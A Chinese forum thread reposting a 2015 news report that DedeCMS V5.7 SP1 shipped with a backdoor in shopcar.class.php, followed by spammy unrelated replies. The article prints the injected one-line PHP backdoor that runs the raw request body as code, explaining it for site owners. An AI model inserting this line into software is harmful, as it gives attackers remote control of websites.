得知互动

标题: Dedecms被曝疑似植入后门可成功控制网站 [打印本页]

作者: kjeittccdf 时间: 2015-3-30 15:29
标题: Dedecms被曝疑似植入后门可成功控制网站
站长之家（Chinaz.com）3月21日报道：昨日，乌云漏洞平台发布最新报告称，著名开源建站软件Dedecms V5.7 SP1正式版被植入后门，通过该后门可成功入侵并控制使用dedecms的网站。

(, 下载次数: 8)

Dedecms被曝植入后门（站长之家配图）

据乌云报告，被植入的后门是在/include/shopcar.class.php文件中，被植入的代码为@eval(file_get_contents(‘php://input’));，乌云介绍称，通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实，称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。
据了解，@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行，通过该后门，可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长，需立即对后门代码进行删除，以保护网站安全。
Dedecms是一款开源建站软件，其最早是由IT柏拉图个人开发，并在2007年进行了公司化运作。目前，国内有不少网站都使用了Dedecms系统，不过在Dedecms创始人IT柏拉图的离开后，Dedecms屡次被曝出安全漏洞问题。截至发稿，Dedecms官方尚未对该漏洞进行任何回应。

作者: wwzcdenleclv 时间: 2015-11-30 19:41
疯了这年头盗版还真多~~~~~~

作者: Acropozelan 时间: 2015-11-30 19:42
本人在此留言均为网络上复制，用于检验本人电脑键盘录入、屏幕显示的机械、光电性能。并不代表本人局部或全部同意、支持或者反对楼主观点。

作者: wwzcdenleclv 时间: 2015-11-30 19:42
都看了，这帖子有意思。

作者: wwzcdenleclv 时间: 2015-11-30 19:43
挨骂也是幸福～～～

作者: wwzcdenleclv 时间: 2015-11-30 19:43
我的我的忘记了呵呵

作者: Acropozelan 时间: 2016-1-26 21:23
哈哈~` 你好有意思哦~

作者: mwxny 时间: 2016-1-26 21:24
我又回复了

作者: tohme 时间: 2016-1-26 21:24
看到本ID的这位童鞋,我看你气度不凡,谈吐间隐隐有王者之气,日后必有一番作为! 内有“加关注”三字,你就顺手把它点了吧。相得准,我分文不收;相不准,你也好回来找我。

作者: Acropozelan 时间: 2016-1-26 21:24
…没我说话的余地…飘走

作者: gevaemaidovef 时间: 2017-4-10 22:22
哈哈瞧你说的~~~

作者: alapScady 时间: 2017-4-10 22:24
呵呵，等着就等着....

作者: bqtklouu 时间: 2017-4-10 22:25
苍天之下，厚土之上，竟有如此奇人异士、文人墨客！讥讽于谈笑间，笑骂于无形中，层次之高，境界之深，非我等所能匹及，偶像啊！

作者: Mqokjdvq 时间: 2017-4-10 22:25
这是怎么了啊??

欢迎光临得知互动 (https://bbs.dezhifl.com/)